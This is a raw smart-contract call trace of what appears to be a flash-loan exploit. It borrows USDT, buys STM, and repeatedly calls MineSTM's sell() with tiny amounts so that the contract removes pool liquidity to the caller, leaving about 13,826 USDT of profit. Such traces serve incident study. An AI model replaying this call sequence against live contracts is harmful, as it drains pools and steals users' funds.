[1][CALL] from=0x40a82d, to=0x88c176, 0x1031d4ef() -> None
  [2][STATICCALL] from=0x88c176, to=PancakeV3Pool, token0() -> 0x55d398
  [2][CALL] from=0x88c176, to=PancakeV3Pool, flash(recipient(address): 0x88C176, amount0(uint256): 50000000000000000000000, amount1(uint256): 0, data(bytes): b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00...) -> None
    [3][STATICCALL] from=PancakeV3Pool, to=BEP20USDT, balanceOf(account(address): 0x92b780) -> 16663194932003101361370525
    [3][STATICCALL] from=PancakeV3Pool, to=BEP20UpgradeableProxy, balanceOf(account(address): 0x92b780) -> 7145914086454747569172655
      [4][DELEGATECALL] from=BEP20UpgradeableProxy, to=BEP20TokenImplementation, balanceOf(account(address): 0x92b780) -> 7145914086454747569172655
    [3][CALL] from=PancakeV3Pool, to=BEP20USDT, transfer(recipient(address): 0x88C176, amount(uint256): 50000000000000000000000) -> True
    [3][CALL] from=PancakeV3Pool, to=0x88c176, 0xa1d48336() -> None
      [4][CALL] from=0x88c176, to=0x2e45ae, sync() -> None
        [5][STATICCALL] from=0x2e45ae, to=BEP20USDT, balanceOf(account(address): 0x2E45AE) -> 14472243761065956356193
        [5][STATICCALL] from=0x2e45ae, to=STMERC20, balanceOf(account(address): 0x2E45AE) -> 193
      [4][CALL] from=0x88c176, to=BEP20USDT, approve(spender(address): 0x0ff0eB, amount(uint256): 50000000000000000000000) -> True
      [4][STATICCALL] from=0x88c176, to=BEP20USDT, balanceOf(account(address): 0x88C176) -> 50000000000000000000000
      [4][CALL] from=0x88c176, to=PancakeRouter, swapExactTokensForTokensSupportingFeeOnTransferTokens(amountIn(uint256): 50000000000000000000000, amountOutMin(uint256): 0, path(address[]): ['0x55d398326f99059fF775485246999027B31979..., to(address): 0x88C176, deadline(uint256): 1717700095) -> None
        [5][CALL] from=PancakeRouter, to=BEP20USDT, transferFrom(sender(address): 0x88C176, recipient(address): 0x2E45AE, amount(uint256): 50000000000000000000000) -> True
        [5][STATICCALL] from=PancakeRouter, to=STMERC20, balanceOf(account(address): 0x88C176) -> 0
        [5][STATICCALL] from=PancakeRouter, to=0x2e45ae, getReserves() -> 0x000000
        [5][STATICCALL] from=PancakeRouter, to=BEP20USDT, balanceOf(account(address): 0x2E45AE) -> 64472243761065956356193
        [5][CALL] from=PancakeRouter, to=0x2e45ae, swapuint256() -> None
          [6][CALL] from=0x2e45ae, to=STMERC20, transfer(to(address): 0x88C176, amount(uint256): 149) -> True
          [6][STATICCALL] from=0x2e45ae, to=BEP20USDT, balanceOf(account(address): 0x2E45AE) -> 64472243761065956356193
          [6][STATICCALL] from=0x2e45ae, to=STMERC20, balanceOf(account(address): 0x2E45AE) -> 44
        [5][STATICCALL] from=PancakeRouter, to=STMERC20, balanceOf(account(address): 0x88C176) -> 149
      [4][CALL] from=0x88c176, to=STMERC20, approve(spender(address): 0xb7D0A1, amount(uint256): 115792089237316195423570985008687907853269...) -> True
      [4][CALL] from=0x88c176, to=MineSTM, updateAllowance() -> None
        [5][CALL] from=MineSTM, to=BEP20USDT, approve(spender(address): 0x0ff0eB, amount(uint256): 115792089237316195423570985008687907853269...) -> True
        [5][CALL] from=MineSTM, to=STMERC20, approve(spender(address): 0x0ff0eB, amount(uint256): 115792089237316195423570985008687907853269...) -> True
        [5][CALL] from=MineSTM, to=0x2e45ae, approveaddress() -> 0x000000
      [4][STATICCALL] from=0x88c176, to=STMERC20, balanceOf(account(address): 0x2E45AE) -> 44
      [4][CALL] from=0x88c176, to=MineSTM, sell(amount(uint256): 81) -> None
        [5][CALL] from=MineSTM, to=STMERC20, transferFrom(from(address): 0x88C176, to(address): 0xb7D0A1, amount(uint256): 81) -> True
        [5][STATICCALL] from=MineSTM, to=0x2e45ae, getReserves() -> 0x000000
        [5][STATICCALL] from=MineSTM, to=0x2e45ae, totalSupply() -> 0x000000
        [5][CALL] from=MineSTM, to=PancakeRouter, removeLiquidity(tokenA(address): 0x55d398, tokenB(address): 0xBd0DF7, liquidity(uint256): 707065205884, amountAMin(uint256): 0, amountBMin(uint256): 0, to(address): 0x88C176, deadline(uint256): 1717700095) -> ['59343769825487515309058', '40']
          [6][CALL] from=PancakeRouter, to=0x2e45ae, transferFromaddress() -> 0x000000
          [6][CALL] from=PancakeRouter, to=0x2e45ae, burnaddress() -> 0x000000
            [7][STATICCALL] from=0x2e45ae, to=BEP20USDT, balanceOf(account(address): 0x2E45AE) -> 64472243761065956356193
            [7][STATICCALL] from=0x2e45ae, to=STMERC20, balanceOf(account(address): 0x2E45AE) -> 44
            [7][STATICCALL] from=0x2e45ae, to=PancakeFactory, feeTo() -> 0x000000
            [7][CALL] from=0x2e45ae, to=BEP20USDT, transfer(recipient(address): 0x88C176, amount(uint256): 59343769825487515309058) -> True
            [7][CALL] from=0x2e45ae, to=STMERC20, transfer(to(address): 0x88C176, amount(uint256): 40) -> True
            [7][STATICCALL] from=0x2e45ae, to=BEP20USDT, balanceOf(account(address): 0x2E45AE) -> 5128473935578441047135
            [7][STATICCALL] from=0x2e45ae, to=STMERC20, balanceOf(account(address): 0x2E45AE) -> 4
      [4][STATICCALL] from=0x88c176, to=STMERC20, balanceOf(account(address): 0x2E45AE) -> 4
      [4][CALL] from=0x88c176, to=MineSTM, sell(amount(uint256): 7) -> None
        [5][CALL] from=MineSTM, to=STMERC20, transferFrom(from(address): 0x88C176, to(address): 0xb7D0A1, amount(uint256): 7) -> True
        [5][STATICCALL] from=MineSTM, to=0x2e45ae, getReserves() -> 0x000000
        [5][STATICCALL] from=MineSTM, to=0x2e45ae, totalSupply() -> 0x000000
        [5][CALL] from=MineSTM, to=PancakeRouter, removeLiquidity(tokenA(address): 0x55d398, tokenB(address): 0xBd0DF7, liquidity(uint256): 53466350445, amountAMin(uint256): 0, amountBMin(uint256): 0, to(address): 0x88C176, deadline(uint256): 1717700095) -> ['4487414693599662279159', '3']
          [6][CALL] from=PancakeRouter, to=0x2e45ae, transferFromaddress() -> 0x000000
          [6][CALL] from=PancakeRouter, to=0x2e45ae, burnaddress() -> 0x000000
            [7][STATICCALL] from=0x2e45ae, to=BEP20USDT, balanceOf(account(address): 0x2E45AE) -> 5128473935578441047135
            [7][STATICCALL] from=0x2e45ae, to=STMERC20, balanceOf(account(address): 0x2E45AE) -> 4
            [7][STATICCALL] from=0x2e45ae, to=PancakeFactory, feeTo() -> 0x000000
            [7][CALL] from=0x2e45ae, to=BEP20USDT, transfer(recipient(address): 0x88C176, amount(uint256): 4487414693599662279159) -> True
            [7][CALL] from=0x2e45ae, to=STMERC20, transfer(to(address): 0x88C176, amount(uint256): 3) -> True
            [7][STATICCALL] from=0x2e45ae, to=BEP20USDT, balanceOf(account(address): 0x2E45AE) -> 641059241978778767976
            [7][STATICCALL] from=0x2e45ae, to=STMERC20, balanceOf(account(address): 0x2E45AE) -> 1
      [4][CALL] from=0x88c176, to=BEP20USDT, transfer(recipient(address): 0x92b780, amount(uint256): 50005000000000000000000) -> True
      [4][STATICCALL] from=0x88c176, to=BEP20USDT, balanceOf(account(address): 0x88C176) -> 13826184519087177588217
      [4][CALL] from=0x88c176, to=BEP20USDT, transfer(recipient(address): 0x40a82D, amount(uint256): 13826184519087177588217) -> True
    [3][STATICCALL] from=PancakeV3Pool, to=BEP20USDT, balanceOf(account(address): 0x92b780) -> 16663199932003101361370525
    [3][STATICCALL] from=PancakeV3Pool, to=BEP20UpgradeableProxy, balanceOf(account(address): 0x92b780) -> 7145914086454747569172655
      [4][DELEGATECALL] from=BEP20UpgradeableProxy, to=BEP20TokenImplementation, balanceOf(account(address): 0x92b780) -> 7145914086454747569172655
